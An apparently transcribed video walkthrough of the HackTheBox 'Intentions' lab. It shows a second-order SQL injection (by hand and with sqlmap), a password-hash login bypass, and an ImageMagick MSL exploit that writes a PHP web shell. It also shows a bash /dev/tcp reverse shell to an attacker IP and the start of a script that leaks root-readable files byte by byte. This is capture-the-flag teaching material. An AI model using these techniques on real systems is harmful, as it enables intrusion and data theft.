What's going on YouTube? This is Ipsec. I'm doing intentions from HackTheBox, which I had a lot of fun doing this box. There are a lot of nice challenging things to do. It starts off with the second order SQL injection, something I don't see that much, but I've definitely seen it happen in the real world. And it's hard to automatically detect this because you have to put tainted information in the database, then hit another page that causes the SQL injection. Bit tricky to find, but once we do, it's rather easy to exploit. And if you have troubles, I also show you can exploit it with SQL Map. With that, you can dump the database. You can't really crack any passwords, but if you enumerate the API, you can discover a v2 endpoint of login, allows you logging in with the password hash instead of the password itself, which is a bit odd, but you get logged in as an admin user, and then exploit ImageMagick in a way I've never exploited before. It was pretty fun. And then you get a shell to the box and exploit a capability binary like a setuid binary where you can leak 1 byte of a file at a time, so it's a pretty fun coding challenge. So with all that being said, let's just jump in. As always, we start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it intentions, then the IP address of 10.10.11.220. This can take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open, the first one being SSH on port 22. Its banner tells us it's running OpenSSH on a Ubuntu web server. And then we also have HTTP on port 80 running Nginx also on Ubuntu. There's not much more information. I guess we have the title of the page is intentions. So let's just go take a look at the web page itself. So going to 10.10.11.220, we get the intentions image gallery where we can log in and register. And right off the bat, when I click these, I notice there's no new page being loaded, right? If I reload this page with the network tab open, click register, log in, we just see it instant and this having a few JavaScript files. So this looks like maybe like a Vue or React type of web page that doesn't have like actual pages. It's just like one big web page. Not sure exactly, but later on, I am going to enumerate those JavaScript files just to see if there's anything hidden there. But that is just something to take note of whenever a page opts to be loaded this way. So I'm going to look at admin at intentions.htb, password of password, and let's intercept this request to see if it sends us to like a PHP script or what does this look like, right? Because the request can turn out a lot of information. And right off the bat, if you look at this, it doesn't look like this is leaking that much information, right? It's just an API login. However, they're both being XSRF token in the header and cookie. This is very much a Laravel thing. I don't know of many other frameworks that would put it in 2 places right off the bat, just as a default functionality, right? I don't think Django does that. Also, Django, I think this name is CSRF token. Let's look at the Django docs real quick. So if we do Django docs, and let's see, settings. Here we go. And if we do CSRF cookie name, the default is CSRF token, right? And there's also a CSRF header name. And the default is X CSRF token with no dash. And this is using XSRF with a dash. So you can see this type of information does leak a lot about the backend technology. And it being Laravel means I'd probably try a lot more like type juggling of type of attacks if I get stuck, just because that is a common thing on Laravel API servers. But right now we're still in the enumeration phase. So send this over to repeater. We do get login error. So let's try registering an account and seeing what we get. So if I go to register, let's do root at ipsec.rocks. Oh, that's the name. Email. Password's going to be password. So we can now log in with ipsec password. Root at ipsec.rocks. Password. And we get logged in. So we have this page. We probably have more JavaScript files, I would guess. If I refresh this, wow. Oh, that's a lot of images. So we have a gallery.js now, and it looks like all JavaScript are within this JS directory. So if I want to run a GoBuster, I'm going to GoBuster both the root domain and also the JS. So let's do this real quick. So go buster directory mode -u HTTP 10.10.11.220 word list op sec list discovery web content raf small words dot text and -o. This would be go buster dot root. So we have that running, and then we can also do the same exact thing, but we're going to specify /js and then the extension JS, and we'll call this gobuster.js. So now we're looking for all JavaScript files as well. And this will come in handy if we ever get hung. We can take a look back at there, right? So I always like having recon running in the background because, again, when you get stuck, you can't hack time and it's just going to be painful waiting for something to finish. So we have this gallery page and it's sending us a bunch of pictures. I see like genre architecture. There was some genre animals, food, whatever. If I click on feed, food, whatever. If I go to profile, we can see our favorite genres. So if I click on feed real quick, it starts off with food. I'm going to remove food, go back to feed, and we just have nature. So something is going on here. I am going to try the SSTI payload I always like using just to see if this does anything. So I'm going to copy this. And this is just like an SSTI that will crash a lot of various things. So if I just put it here, submit, preferences updated, go into feed, and it looks like we get nothing. So what I'm going to do is let's intercept this request and see what it looks like on the wire. So we refresh this page, we get gallery, then we get this API request. So I'm going to intercept this, and we just have server error. So it's not really sending us too much information. Take this off, refresh the settings page, and let's see. What could be a bad character? I'm just going to delete all those. I think the quotes are generally bad characters. And right now I'm trying to find out, is this server-side template injection or SQL injection, right? So I'm just creating errors on the page until I get to something that starts standing out. So we send this, status success, server error, and I'm going to delete a bunch of stuff so my genres is on the same field. I can delete this from the header. I need content type. That's one of the important ones. We don't need that. Probably don't need that. Let's see, DNT and origin. Don't need. There we go. So we still get status success. So now I can quickly switch between the two. So server error, let's get rid of a double quote. Go over server error. Let's get rid of a single quote. Go back. And we get success, but nothing. So single quotes are failing. It typically, whenever a single quote is a bad character, it's going to be some type of SQL injection. So let's go back and make sure this is something that's good. I think travel was a tag, right? So if I look at this, we don't get anything. What was it? Animals? There we go. So I always like seeing a success here with some data when I play for SQL injection. So I'm going to do a single quote. We get server error. I'm going to add a comment afterwards. Still get a server error. If I do animals with a comment, we get success, nothing. So animals probably does have something here, or it's not SQL injection. We send this. I probably needed to escape that, or maybe not. So it's only a single quote that is causing this to error. And we could have sent this to fuff and fuzzed it that way, right? But so I wonder if, so there's a few ways we could do this in SQL. I'm going to go over to SQL Fiddle and play with something real quick. So go here, Google. I probably need to take this off of this. Go to SQL Fiddle. And then view sample. And I hate how the ID is like that. Let's see, rev, that should be fine. Build schema. So this just lets us play with SQL commands, right? We can do select stir from docs, run SQL, and we get all the data. So let's make this database a little bit more like what a target is with genres. So I'm just going to change content to genre, and then we can put some examples. So like, please, example, we'll do, please subscribe, animal, example, travel, and I'll get rid of the fourth one. Okay. Unknown field content. So we need to copy that there. There we go. Now run. It should be executing. So there's a few ways that they could have the SQL. So we have animals right here. So it could be like select all from docs, where, genre, like, animals, and that will, or animal. And the code could do a bunch of or statements. So it could take every single comment we have and just do or, genre, like, whatever. I guess we need to put wildcards here because I did not find it. I think a wildcard is %. There we go. So it could do that and then always do a bunch of or likes, whatever. Now, MySQL also has a find and set functionality. So if we look at it, it's find and set, and then the query and this. So if we go back to a fiddle, we can say where, find and set, and then we can do, let's see, please, genre, like that. Run it. And we get everyone where it pleases here. Now, I made a slight mistake when I was building this, because each of these, imagine rev is going to be image name. So this could be image 1, image 2, image 3. But we only have one field on this. So I don't think like the picture could be tagged as two things. By that, I mean anything in this gallery. All these just have one genre. And that becomes important when we're like figuring out what the query looks like, because we're passing the entire thing here. So if I do build schema, we can say genre is on this side. And then we give it the multiple things. So animals, or animal. Run. I wonder if we have to put this in quotes. Like that. There we go. And we can give it multiple, so I can do please here. And I think this is going to get me both. No native function. So we have to put like this. Awesome. So now we have like the database working as we expect. So if it's using find and set, all that's telling us is we also need a parentheses. So let's try adding that. So we can do animals parentheses, and then we go back. We still get a server error. So what if we just do this and don't end the comment? So another thing that could be happening is maybe the space is a bad character. In MySQL, there's multiple ways to comment, another just being the hashtag. If we just do that, we get the data back. So the issue what we had going on is space is a bad character. And since space is a bad character, we can't use dash dash space dash. And one of the odd things is we can't use dash dash comment dash, which is weird because the comments in any part of the SQL query except after dash dash can behave as a space, as we're going to find out in a minute. It just can't behave as a space after dash dash because dash dash specifically looks for a space and the comment acts as a delimiter, which isn't exactly the same thing. So now we have this, and all we want to do now is see if we can get union injection. I'm going to guess there's 1, 2, 3, 4, 5, 6 fields. So we can say like this, and then if we did order by 1, this should pass. But the reason it won't pass is because space is a bad character. And we found that out when we were doing the comment. So I'm going to replace all the spaces with comments. And then we go back here and we get a query back. So we know there's at least one column. We assume there were 6. So if I do 6 and we get data back, it works, but it does not. We get server error. So let's do 5. Go here and we get data back. So there's 5 columns. 1, 2, 3, 4, 5, 6. So I'm guessing ID probably is not returned, and that's just the application incrementing it. So it returned just these 5. But yeah, so now we can go over to a union. So we can say union, select, and then 1, 2, 3, 4, 5. Go here. And I expected to see, oh, the reason we're getting a bunch of stuff is because our union is at the very bottom. So what I want to do is get rid of animals in our genre. So we only return 1 result. And let's see, 1, 2, 3. I don't see, oh, URL is used twice. So it does return the ID back, but URL is, it just does storage and then file. We can see 2 is used twice here. And then the time for 5 is right there. So now that everything is making sense, we can go and start extracting the database. So I'm going to put everything in the file. So where 2 is, we can just write our own select statement. So I can do select, group concat, and I'm going to go to information schema table. I don't know why it started defaulting to DuckDuckGo. I'm sure it would have got me to the same place. Just want to go in here. And I always start with schemata, because this is going to tell me all the databases. So schema name is going to be the name of the database. So group concat, schema name from information schema dot schemata. And what we have to do is replace all the spaces, which is annoying. Okay, and we run through, and we can see 2 things. And if you're curious exactly what's happening, because I just realized I didn't fully explain it, it's a second order SQL injection. We're putting tainted information in the database, and then when the database pulls that information and uses it for another query, it's not doing proper, like, prepared inject a proper SQL query and allows for injection. So we're just putting bad information in that it later uses in a SQL query, and it exploits it that way, right? So we did say intentions was the database. So now I want to go back to the documentation, and let's go to columns, and I want table name, column name. So we can do group concat, table name, and then column name. And I'm also going to add a colon between that, and information schema dot columns, then where the table schema is equal to intentions. And we can also do like to get rid of a potential bad character. Whenever I can change between like an ASCII character or a special character, I always favor the ASCII character. Okay. So we send this query, run it, server error. We screwed up somewhere. Like intentions. So group concat table name, column name. Oh, I have column A. Typo, columns. There we go. So this is a list of the table structure. So I can just copy this, and then we can do v intentions.table, I'll call it, I guess. Put that in. And then I'm going to replace every comma with a line break on that. And we have the table structure. So I probably want to get user's name, email, password, and admin. So let's do that in a query. I'm going to call this dump table struct. So we save that so we have it in our notes later. And now we want to dump, we called it what? Admin, user, email, password, I think it was. User, put a single quote, email, or a colon, password. And we don't need to do from information schemas. We can just replace this with from users. We don't have to do intentions.users because we're already in that database, because that's what this query is using. So we don't have to do any cross-database stuff. Hit that. Return server error. We screwed something up. Admin. So we got admin, name, email, password. Group concat admin, user, email, password from users. Maybe we do. Intentions.users. Let's just add it. Repeater, this. Still an error. We have a typo somewhere, I would bet. Let's just say group concat admin. Go back here. Server error. Okay, where is this? We have the union select one, select group concat admin from, is it just user? No, it's users. Huh. Select. Oh, I have a single quote there. There we go. That was the issue. So I'm going to Control Z a few times. There we go. Get rid of that single quote. We don't need intentions. Okay, what the hell? Group concat with just admin. That works. I think I had a space there. Nope, no space. Admin, user, email, password. Okay, the colon's fine. It's name, not user. There we go. That does it. It's always the simple things. Okay, we can copy this, and then we can call this users.table, paste it, sed s, comma, or n, g on users.table. What's going on? This is Ip from the future, and if you didn't want to exploit this SQL injection manually, SQL Map does support second order injection. So to do it, we just have to grab both requests. So I'm going to go back to my profile. We're going to set burp suite, and we're going to turn intercept on. Click update to capture this request. And then we can just save the item to a file, or maybe copy to file, I should say. And let's make sure we're in the correct folder. And I'm going to call this update genre.request. Save it. And if we look at it, we can see that's just the HTTP request. So now let's go and capture the second one. So I can just forward that. We go back to here, and this is where the actual SQL injection comes back. So let's intercept this. And we don't want this one or the JavaScript. We want the API v1 gallery user feed, because this is where we actually saw the SQL injection, right? The other things is just the page that gets redirected to eventually land on this. So let's copy this to file, and we can say get feed.request, and now we can SQL map. So we can do SQL map -r, and then we want to update the request, and then the second parameter is going to be a second request, and this one is what do we call it? There's my go bust a window. We called it get feed. I don't know why I did a capital G there. That threw me off. And to speed things up, I'm going to do --dbms MySQL, because we already know that. And we can do -b for batch. And let's see if it finds it. JSON, maybe it was --batch. There we go. So it's going to attempt to exploit it. And I forgot one thing. Remember, we cannot use spaces. And there are tamper scripts. So user share, is it SQL map, then tamper? These are all the default tamper scripts, and one is space to comment. So let's add that. So I'm going to add a --tamper is equal to space to comment. And if this is going, we can go back here, look at profile, and I believe we'll see the profile be changing to various payloads that SQL Map is using. So this is one of them ones that it attempted to use. We can refresh and see it will keep on changing. It was trying a union select right there. And let's see. It found Boolean blind and time-based blind. It didn't actually find union injection. We can change the level equal to 5 and risk equal to 3. And this may confirm more. Let's see. I wonder if we have to clear the history. Let's see. And I forget exactly how to do that. Man, is there a fresh? Let's see. DBMS, risk, technique, all. Flush session. Let's flush the session. And now it's actually going to retest. What it was doing before is detecting that we've already ran SQL Map, and it detected what vulnerabilities it knew about. So it didn't keep on trying things like that union injection. So I'm just going to speed up this video and we'll get to the very end. And now that SQL Map is done, when we added the level, we can see it has now detected union query. I'm not sure exactly what the level changed, what payload it now used that it allowed it. You can see this was the query here. I actually took out the risk when I added flush session. So you don't need risk, you just need the level, it looks like. And this may look confusing, the concat, and then it just doing hex, this isn't actually extracting data. Whenever SQL Map tests for things, it likes using random strings. So I bet if we grab this and do like Python 3 bytes from hex and put this in, we can see it's just random strings. So again, SQL Map just puts random strings and then searches the page for that random string. And if it exists, then it knows it's vulnerable, right? So this is just making a random string, I believe. So you could now add the -- dump flag, and it will start dumping all the data out of this. And oh man, I left the flush session. So it's going to take a while to run because it's going to redetect all the queries. But that is going to be how to do this with SQL Map. Hope you guys enjoyed it. Now let's get back to the video. There we go. So now we have a complete dump, and we have password hashes for everything. And I normally would go throw these in the crack into crack, but it doesn't get us anything in this context. So I'm not going to waste your time by attempting to crack a bunch of these passwords. But we do have two potential usernames. We have Steve at intentions.htb and Greg at intentions.htb. And we also have the hash. And I got stuck for quite a while trying to figure out what to do here. But I went back to my recon and looked at gobuster.js. And let's grep-v for 403. And we do have an admin.js functionality. So let's go take a look at what admin.js is. So let's just go here. I can see admin.js. It's js/admin. Okay. Proxy is on. Intercept, refresh. Burp suite. Let's disable that so we can capture JavaScript. Refresh. Go to repeater tab. And we can look at all of this. And how I knew this was view is if we look at this license, so admin.js.license.text. Let's just look at that. Bootstrap, where is, it's part of the view router Vue.js. So this is compiled JavaScript, so it's going to be a bit of a pain to read, but if we scroll around, we can figure out what's going on. The main issue, though, is this file is huge. You can look at like the scroll window, and there's just so much information here. So it really helps if we just search for like keywords we want, like /API. If I search for /API, we can see the Axios get, so this is getting API v2 admin image. So we could try making a request to that. So if I go back to Burp Suite, and let's just make a request to this, and I'm guessing this is some authorization error. Oh, 404 not found. Was that a post? Axios get API v2 admin image, and then an ID. It's redirecting to, so I'm guessing it redirects us to the home page because we're not authorized. Yeah, that must be it. So we could try we could try looking for IDOR vulnerabilities, is what I'm trying to say, on all those URLs that have API. So let's find next. There's 4 matches. So we have admin image, image modify, gallery images. So let's see. V2, gallery images. And this is the same thing as the V1 endpoint, it looks like. I don't see what's different here. Where we actually, is there V1 gallery images? There is. So these endpoints look the same. I'm looking at content length right now, 4644, 4644. So these requests are probably the same. Is there any other API? There's an admin users functionality. So admin, what was that? Yeah, /admin/users. And this redirects us, so there's probably authentication required there. And that's it for hits on /API. If I search for just API in general, we have 18 matches. If I add a space before API, we get down here, which looks like messages, which is a little bit weird because normally like these type of messages would be in a REST call. By that, I mean, you'd like make a GET request to API v2 /messages and return a list of messages. But we have it just hard-coded in JavaScript, which is fine, I guess. So this is talking about something about DMCA because we see copyrighted images slip into the gallery, could be an image. But here, I have deployed the V2 API to production and started using the admin section. Let me know if you spot any bugs. Major passwords are no longer needed to be transmitted to the server in clear text. They're hashing them. So we don't have any links to the admin V2 login, but I would bet we can just do a post and to /v2 auth login. And when we do that, we get an error message that says the hash field is required because we have email already. If we removed email, we get email and hash. So let's do email, hash, and let's use an admin. So I'm going to, was it here I had it? We can use steve@intentions.htb. And then the hash. Copy, paste. And we get a login success. So what I'm going to do now is log out of the application and log back in with Steve. So here, let's clear all my cookies. So I can just go here, where is storage. We can delete all session data. There we go. And I'm going to log in with this information. We're going to intercept and redirect it to V2 and see how the application behaves. So we do that. Let's go to the proxy, intercept with Burp Suite, sign in. And now we want to change this to be hash and this to be V2. And if you did that and did not get the request, make sure your proxy settings are, this checkbox is not enabled, or you remove JS right here, because by default, you're not going, no, never mind. We're not making a request to JavaScript, so ignore that. But yeah, let's just forward that now. Invalid credentials. Intercept. So we do V2. Email hash, send this to repeater, login error. Did I not copy the whole hash? Okay, the hash was wrong. I don't know what hash was in my clipboard. So we can forward this along. And now we got a request to gallery, so we're logged in now as Steve. We don't see anything else here, though. If I go back to my GoBuster, let's do gobuster.root, grep-v 403. There is a /admin that we weren't able to see. So let's go to /admin. And now we get logged in. And these are the messages that we saw from that JavaScript before. If I click on users, we have a list of all the users here. No functionality, really. We can't do anything with them. But that's what that admin users endpoint did. If I go to images, we now have this edit button, and we can do filters on the image. So let us now intercept this. So intercept is on, and intercept the request. And let's take a look. Now, the first thing to really try is just like any type of file disclosure vulnerability, right? So let's go back down here, and I'm going to change the path to be just like etc passwd, and let's see if we can apply any type of effect on just a regular text file. And we get bad image path. Let's see if we get rid of the JPEG, bad image path. So that applies the effect. If we have a invalid file, we also get it. I was just enumerating the error messages there because I wanted to see if it would say unknown file or bad image path, right? Because if it said unknown file here and it ended in .jpeg, then we knew like our Etsy pass WD request would have to end in .jpeg. But since bad image path is for both, if it doesn't exist and doesn't end in the correct extension, we can't enumerate that way. We could still try like Etsy pass WD and then a null byte or something. Let's see, .jpg like that. Still a bad path. So that doesn't work. The other thing we could test for is just like SSRF, server-side request forgery. So I can do HTTP 10.10.14.8. Let's do port 8000, NC LVNP 8000, send the request. And we do have SSRF, but it doesn't really buy us anything. Let's see, if we put an actual image here, let's do make dir www find /-name stir.jpg. Sure, let's do meterpreter.jpg. That is a JPEG. And let's just see what it says. Does it still say bad image path or does it do something? So it gives us the image back. But there's not much we could do with it. Let's see. If we did v test.jpg, IPsec was here. Bad image path. So it actually has to be an image file. I was hoping like if we gave it a text file, had the JPEG extension, if it would give us the text back, it doesn't. So I don't know what to do with this. And I did a lot of research into just ImageMagick exploits. And let's see if I can find the blog post right away. PHP Object Initialization vulnerability, maybe? It's probably instantiation or something. Let's see. This is it, the PT swarm. This is a really good post on exploiting it. It goes into ImageMagick and also has a technique I learned about exploiting ImageMagick in it. So I'm just trying to find the important parts of this, but I highly recommend reading the whole thing. But we'll summarize it up in just a minute. Let's see. Discovering. Okay, here we go. So one cool thing is right here is ImageMagick's path parsing. So it talks about using this to change the size. And this is something unique to ImageMagick, I believe. So you can enumerate if that's being used. So let's Control-Z request back to the beginning. Let's see, and we need JPEG like that. So we have a JPEG that's 69,000 in length, right? So if I do 1x1, now it's only 959. So we've changed the image resolution just by passing the file name, just because of ImageMagick's like magic parsing, I guess I should say, right? So that is one way they could enumerate. And what I just noticed that I didn't catch before is HTTPS goes to PHP, but HTTPS with / goes to curl. I just want to test that out real quick. I have not actually done this, so I don't know what I'm expecting. HTTPS. I wonder if I can do HTTP if I don't need S. 10.10.14.8, 8000. Because I don't feel like setting that up. See, I would need to set up an SSL handler to capture that, and I don't feel like doing that right now, so we'll skip that. But that is interesting that it supports that. And let's see. Now something else makes sense. So if you do just the /, then the -k is going to be defaulted. So you can just accept invalid certificates, which is interesting. But all this isn't really that needed. So right here, they're talking about how you can crash the worker process in ImageMagick. And when you upload a file in PHP, it writes that temporary path to /temp/php like random 6 characters. So you could just crash it 20,000 times and then you'd have a realistic chance of guessing this. And this could be anything you put into it. So you could just put a shell into it, and then if you had an include, you could jump over to it. But nowadays you don't need to upload files for an include. You can just exploit it right away. But we don't have an include statement. I'm just saying you can now predictably guess wherever you upload a file to, because this will crash it after uploading a file. If that doesn't make sense how we're going to use this yet, it will in a second. So just like how we specified this, we can change the behavior of ImageMagick. And if we give it a .msl file, or just an MSL file, it doesn't have to be .msl. If we give it this, then it's going to go into its magic scripting language. And then we can read a file and write a file. So we could write a file to the web server, and we can just write a PHP shell. So let's go here. And then RC2, the vid scheme, what this is saying is we no longer have to brute force the /temp PHP file. Like all before, we're assuming we'd run this request 20,000 times, so we have a realistic chance of guessing a file name on the server. But the vid scheme allows for a wildcard. So if we have the scope be vid MSL, then we can do /temp/php star, and that will just get the first file. So that is what we will be doing. And it gives a final payload. So we have to send it in a multi-part form data, because that's what enables PHP to start writing files to. And then we can give it arguments. So let us see if I can get this right the first try, because this was not intuitive. So we don't want the content type to be application JSON anymore. We want it to be multi-part form data. And then we want to, since the boundary is ABC, you do -- and then ABC. And I think we could leave all this the same. Let's see. I have the request in another thing, so that's fine. So this is going to write a shell that's PHP eval. I don't want to do eval because eval is just going to execute PHP code. I'm going to make it system. So that's automatically doing a system command because that's how I want to do it. And that's doing a request. I'm going to rename A to CMD just because that's what I normally use. We don't need that comment there. And then we need to write to a file. And I don't know where the web app is off the top of my head, but let's see. We did have the full path in one of these. Let's see. Here we go. I think. Storage. Let's go back to our SQL injection. I'm going to save this, and we can say, call this dump user. And then I'm just going to change the genre back to travel. Then we make a request, and that's not it. Maybe animal. Is it animal or animals? There we go. So we can get part of the file. So we have storage animals. I thought this would give us the full path. Public animals, storage. Let's see. How can we get the full path for this? Because that is the piece we are missing. Because it could be like var www HTML storage. Let's just guess this real quick. rce.php. Let's see if this works. So we send that, and then we're going to need to send 2 parameters. And Laravel by default, even if it's a post request, will accept parameters in the header. So you can just do it this way. So path is equal to vid MSL like this, and scope is equal to charcoal, I guess. Was it scope? No, it was effect. And I'm going to call it shell actually. So let's do 10, 10, 11, 220, shell.php, file not found. I'm going to send this request, and we have bad image path. That did not work. Refresh, still file not found. So we screwed something up. If I get rid of path, path is required. So we'll put path back in. I was pressing Control Z and I don't know what it was undoing. This is equal to, what is it? Where'd that page go? Let's see, content form data. I wonder if I need this to be JPEG file name. Nope. It could be this path is wrong. So let's go back to a legitimate request before we edit it. Oh, it gives us the full path. Var www HTML intentions storage. I think that's what we want. So I forgot the intentions piece. Still got bad image path. Form data, swarm, text plain. So this piece must be wrong somehow. Let's see. Argument value, fit MSL. Multi-part form data. That's looking good. So let's try changing this to be .msl. No. JPEG. File name does not seem to matter. Oh, there's a space there. That looks like it did it. We have a bad gateway error, but I think that is expected. So what happened was when I copy and pasted it from the website, there was a space here, and it copied, which broke the request. So I guess the RFC is line break, and then something. We had line break, space, line break, and that did all sorts of bad things. So we should have storage shell.php. So if we go shell.php, we don't, let's see, is there a /storage directory? Does not look like we have this file. Intentions. Could this potentially be a weird caching issue? Let me just send this to Burp Suite and we can test it. Intercept on. So we definitely get file not found. Let's see, change request, because it could be a post. CMD equals who am I? And we are calling it shell.php, right? It is another Burp Suite window. This can be shell, and this will be exploit. Okay. So var www HTML intentions storage shell.php. Maybe we just can't write here. And I don't think I have a typo, unless it's intention and not intentions. But we have it here, var www HTML intentions storage at public animals. We could put in the animals directory, because that's where images are. And there's a higher chance of us being able to write to where an image is. And we also can know where an image is on the server. Okay, wrote that. I wonder if it's swarm.msl. Is it taking... There's no way it's taking this file name. That's a silly idea, but doesn't hurt to check. 404 not found. Okay, so we got to figure out where the animals are stored. Storage animals. Right. Copy this. Paste. Shell.php. Not found. Huh. Let's see. Is there anything we're doing wrong? Get rid of those spaces there. See if I put the host. Could be a virtual host header. No. I am really not sure why this isn't working. 10.10.11.220, that is the right IP. Let's see. Let's just rename it to something else. rce.php. Nope. I am drawing a blank why that's not working. Do we not do 2 line breaks after that? So what could be happening, I'm probably going to pause the video and wait about 10 minutes. The actual exploit, it is using, so something crashes in the Apache worker after we write a file, and that's why the PHP temporary file is not being cleaned up. So it's writing a file to temp PHP and then something random. There's a possibility that anything I put here isn't working because it's using like maybe one of the random files is PHP1. So I'm never going to hit that because the first one already took precedent, right? I can add a space here to break this completely again. Maybe it cleaned up there. So you can see I remove the space, it works. Then I add that space back and it's still going to give me that error because this PHP file existed from the previous request. So I'm guessing something like that is going on. And I don't know why I can't hit this. Let's see. I should go back to just doing the animals again. Because I think when I tried the animals, maybe I had that one weird issue. So I'm going to go back to this, where it leaks the full path to where this animal is. Then we can put that here. And then rce.php, that looks good. And what we want to do is a get on where we think it is. So I think we said storage animals, whatever. We want to make sure we can get this. That's not found. Okay. So that's definitely where the animals directory is, storage animals. So now I can put rce.php. And now when I run this, hopefully it's been long enough where it cleans it up. File not found. So I think I'm going to pause the video, wait 10 minutes, because I know that's what the cron is for it to reset everything, and then try again. Okay, it's been 10 minutes, and I'm actually going to just put this in the public directory. So let's get rid of animals as well. I think this is where I did it initially. So this is the root of most Laravel projects. And then I was putting it in storage. I'm going to put it in public, and that's where other PHP scripts exist. So I'm going to try putting it here. So hit enter. We're going to get this response of a bad gateway. And then I can go to the shell. We're just getting rce.php on the root. And there we go. That was it. So we just had a bad path here. So we wanted public, not storage there. And now we can run commands. We did who am I, and it's www data. So let's get a shell. So let's just do --c, --i, dev tcp 10.10.14.8, 9001, 0, and 1 like that. And then encode everything. And let's do nc lvnp 9001, catch the shell, python 3-c import pty.spawn bin bash. Oh shoot. Python 3-c import pty spawn bin bash. stty raw -echo fg. And then export term is equal to x term, so we can clear the screen. So now we finally have a shell in the box. We can see I'm in public here. That's where rce.php is. We're putting things in storage. You can see there's attempts there as well. That's our shell.php and RCE. I bet if we did like app, then public, then we'd probably, nope, that's a different directory. I don't know exactly where else we could have done it, but I do want to point out that the animals directory is not writable by www data. At least I don't think it is. Let's see. Let's get out of storage and go into public. And then there's a storage here. Just want to make sure it's not in two places, right? Yeah, so we can't write to the animals, but we can write to public, and that's where everything else is. So huzzah. Now let us look at things, and we do see a .git directory here. So if we do a git log, we need to change some things for this to work. The easiest way, I think, is just to copy this .git directory over to our box instead of trying to figure out all these parameters. So I'm going to do a tar cjvf/dev shm get.tar. I think it's bz2. And then .git. So we're going to just archive everything. I guess I could have just moved it into the web shell, right? Wherever we had the public directory, I could put it there and then just download it. That's what I'm going to do once this finishes copying into dev shm. And man, that's a lot of files. So if I go back into public, we can move dev shm get here, and then just wget 10.10.11.220/get tar bz2. I think it's a gz I made. I always get those tar commands mixed up. But this will download that Git repo. And man, this is a big repo. I did not expect it to be this big. Okay. Let's make dir, let's see. I already have intentions. We'll create site. Then tar xjvf ... get and extract it all. I don't know why I added the V. That probably just slowed things down, bringing the standard out. So now we have this Git directory. If I do a git log, I can see everything because Git is properly configured on my box. So we have a few things. We have fixed Webpack for production. Test cases didn't work on Steve's local database. Switching to user factory per his advice. So I kind of want to see this commit. So I'm going to do a diff between this one and this one to see the database change. We could step through each of them, but this is the one that seems most interesting to me. So we can do a git diff, copy that and that. And let's see. So we have auth login, Greg at intentions, and Greg is the best developer 1998. So looks like we have a potential credential here. If I do a grep for everything that ends in sh on Etsy past WD, we can see Greg is a user. So let's try SSH Greg at 10, 10, 11, 220. Paste in that password, and we get logged in. He only has sh as a shell, so I'm just going to type bash because I like saying the bash shell. And we have a DMCA check, DMC hashes, and user.txt. My first step always is to run sudo. We can paste in Greg's password. Did I already get it off my clipboard? H. Okay, I have it on that one. And Greg can't run sudo. So if we look at DMCA check, we see it's running op scanner on legal uploads and this. Let's see exactly what op scanner is. Let's see, that is, I was expecting some type of set UID file because normally when a CTF does something like this, like the pointing towards this binary, let's see what type of binary this is. It is built in Golang. So normally it's to like exploit some privilege. Maybe it's a capability. Get cap op scanner. Okay, we got cap read search. So this binary has the ability to read files essentially as root. Can't create, can't do anything, but it can definitely read files. So if we look at what op scanner is, it's a copyright scanner application that provides capability to evaluate a single file or directory against known blacklist and return matches. So it looks like, based upon this, we can specify a file path or a directory path. We're probably going to ignore directory paths because we just want to leak files. H is a colon separated hash file. That's not that interesting. L, this is going to be how many bytes of the file it reads. It defaults to 500. And then P will print the calculated file hash only. Let's see. I thought there would be one. Oh, S. For some reason, I completely missed the S. This is going to be a specific hash to check against. So this will allow us probably to leak files 1 byte at a time. So if I cat Etsy past WD, let's do head 1. The very first thing is going to be R. So I'm going to echo-n R MD5 sum. And we can do op scanner. Then was it -c, the file, so Etsy past WD. -l, I'm going to read 1 byte. And -s is this hash I want to check against. So if the very first byte of Etsy past WD is going to be R, then it should have this MD5 sum. And we see it matches. If we did a completely other MD5 sum, so let's just do P, and we run it against this. It doesn't match. So essentially what we're going to do is create a program that will leak characters 1 byte at a time and just keep incrementing this, right? So now we did the MD5 sum for ROO because the first 2 characters is that, and we have it matched. So this is now going to become a coding challenge. So let's create a Python script to automate this. So let's make a directory called code, and then our script will just be exploit.py, and let's open that up in Visual Studio Code. And the very first thing we're going to want to do is make sure we can capture the output and know what happens when we succeed. So there's 2 ways we can do it. We can either capture the entire output of the program and see like if we get something back. Let's see, if we do A, we get nothing. We can also do it by exit codes potentially, and maybe not. So no matter what, the program's exit code is going to be 0. So we have to be able to get the output of the program in order to identify if we have anything. So I'm going to import subprocess, and then we can do a subprocess.run. And then we want to specify the program. So opt scanner scanner. And then what are all the arguments? Let's copy this and put these in quotes. Okay. We also need to set the pipe. So that's standard out dot subprocess pipe, like that. Let's see, I can put this on 2 lines so it's a bit easier for you to read. There we go. And then we want to call this result. And then we can say print result.standardout and print the length of result.standardout. Okay, let's copy this. Python 3, run it. Result is not defined. What? I guess it doesn't like it being on 2 lines. Subprocess.run. Standard out is equal to. Oops. That was it. And standard out is 57 characters. And we have it. Awesome. So we actually don't need to do any string match. We can just say if the length is greater than probably 0. Let's just get a bad hash on. So I'll change that to an F. I forget what that was. It was a C. And we do a length again and 0. So we can say define brute, and I'm going to give it a file and guess. And we can put this in and see. We need to do file, and then we'll also need to hash whatever a guess is. So I'm going to import hashlib, and then we can do hash is equal to hashlib.md5, then guess encode hex digest. That's right. Do hash like that. And the length, we need to do len guess. And this also has to be a string because right now Python's going to have that as an integer. So I'll just make that a string. Okay, so that looks good. And now we can say if the length of result standard out is greater than 0, return true. Else, we don't even need an else. We can just do return false. So now we have some brute force logic. I'm going to test this out real quick. Put this in, and then brute etc pass wd, and we can say if it begins with root. Hashlib is not defined. Import this. True. And we can say please subscribe, and this should be false, right? There we go. So now we have logic to brute force a file from beginning to, well, we have a function that will brute force it. Now we have to create the logic to take the guess from beginning to end. So I'm going to do this in probably a really bad way. So I'm going to import string, and I'm going to say the character set is going to be string.ASCII letters plus string.digits plus, and then let's see, base 64 character set. I think it's plus, period, and slash and equals. Because if we do the base 64 character set, we can get a plus slash equals. a SSH private key. And we also need line breaks, so \n. Okay. So I'm going to set a variable is equal to true, and it's going to be called loop. And we can say, well, it's close. This is autopilot just guessing what I want. I'm going to say the guess is going to be equal to, and I want to get a SSH key. So SSH keygen test.out cat, because I just want to get the beginning of the key. So we can grab this. Okay. Because that's just going to save time. We don't have to brute force the beginning of that because that's a static string in SSH keys. And then we can say while loop for character in char set. Then if brute, we're going to just do this. And I guess we probably should have verified this file exists first. Hold on 1 second. Okay, if it's successful, append guess, print. We want to end with nothing and definitely flush. Okay. So what I was 